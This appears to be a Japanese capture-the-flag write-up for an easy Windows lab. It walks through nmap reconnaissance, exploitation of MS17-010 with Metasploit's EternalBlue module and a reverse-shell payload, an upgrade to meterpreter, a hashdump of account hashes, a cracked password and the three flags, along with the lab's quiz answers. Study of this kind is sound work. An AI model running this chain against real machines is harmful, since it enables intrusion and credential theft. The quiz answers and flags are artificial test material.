- windows
- easy
reconn
nmapで
で空いているポートを見つけます
┌─[user@parrot]─[~]
└──╼ $nmap -sCV -T4 10.10.59.52
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-26 02:16 UTC
Nmap scan report for 10.10.59.52
Host is up (0.32s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=Jon-PC
| Not valid before: 2025-06-25T02:12:45
|_Not valid after: 2025-12-25T02:12:45
| rdp-ntlm-info:
| Target_Name: JON-PC
| NetBIOS_Domain_Name: JON-PC
| NetBIOS_Computer_Name: JON-PC
| DNS_Domain_Name: Jon-PC
| DNS_Computer_Name: Jon-PC
| Product_Version: 6.1.7601
|_ System_Time: 2025-06-26T02:19:40+00:00
|_ssl-date: 2025-06-26T02:19:49+00:00; 0s from scanner time.
5009/tcp filtered airport-admin
5051/tcp filtered ida-agent
13722/tcp filtered netbackup
32774/tcp filtered sometimes-rpc11
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-06-26T02:19:39
|_ start_date: 2025-06-26T02:12:43
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Jon-PC
| NetBIOS computer name: JON-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-06-25T21:19:39-05:00
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:76:0b:e8:be:ab (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
|_clock-skew: mean: 1h00m00s, deviation: 2h14m10s, median: 0s
nmapでvulnを使ってもう一回やります。
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
脆弱性情報CVE-2017-0143を発見しました
- How many ports are open with a port number under 1000?
3
What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)
ms17-010
Metasploitを使います
┌─[user@parrot]─[~]
└──╼ $msfconsole
exploitを探すためにsearchコマンドを叩きます
[msf](Jobs:0 Agents:0) >> search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........)
exploit/windows/smb/ms17_010_eternalblue
useで指定します
[msf](Jobs:0 Agents:0) >> use 0
show optionsで引数を確認します
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/bas ics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows
Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Ser
ver 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R
2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.104.203 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Show options and set the one required value. What is the name of this value? (All caps for submission)
RHOST
set RHOSTでターゲットのIPを指定します。
set LHOSTでshellを返す先のIP(攻撃者のIP)を指定します。
WindowsのRCEをセットします。
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set RHOST 10.10.59.52
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set LHOST 10.8.152.254
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set payload windows/x64/shell/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> run
[+] 10.10.93.63:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.93.63:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.93.63:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
WINと表示されRCEを取得できました。
C:\Windows\system32>
ctr+zでバックグラウンドにしsearchコマンドでmeterpreterを検索します。
If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
post/multi/manage/shell_to_meterpreter
使用する引数を調べます
[msf](Jobs:0 Agents:1) post(multi/manage/shell_to_meterpreter) >>use post/multi/manage/shell_to_meterpreter
- Select this (use MODULE_PATH). Show options, what option are we required to change?
session
さっきのセッションのIDを表示します.
[msf](Jobs:0 Agents:1) post(multi/manage/shell_to_meterpreter) >> sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows 10.8.152.215:4444 -> 10.10.93.63:49176 (10.10.93.63)
setコマンドでセッションを指定し、runで実行します。
[msf](Jobs:0 Agents:1) post(multi/manage/shell_to_meterpreter) >> set session 1
セッションを確認するとmeterpreterのセッションがあります
post(multi/manage/shell_to_meterpreter) >> sessions -l
sessionの2を指定します。
>> sessions 2
meterpreterでhashdumpコマンドを使用しハッシュを取得します。
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
Jonというユーザとパスのハッシュを取得しました。
Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default
user?
Jon
jonのパスの解析をします。
疲労でJohnTheRipperを使用したくないのでcrackstationを使用します。
Copy this password hash to a file and research how to crack it. What is the cracked password?
alqfna22
flagはsearchコマンドで探してもらいます。
> search -f *flag*
> cat C:/flag1.txt
flag{access_the_machine}
> cat C:/Windows/System32/config/flag2.txt
flag{sam_database_elevated_access}
> cat C:/Users/Jon/Documents/flag3.txt
flag{admin_documents_can_be_valuable}
flag1
flag{access_the_machine}
flag2
flag{sam_database_elevated_access}
flag3
flag{admin_documents_can_be_valuable}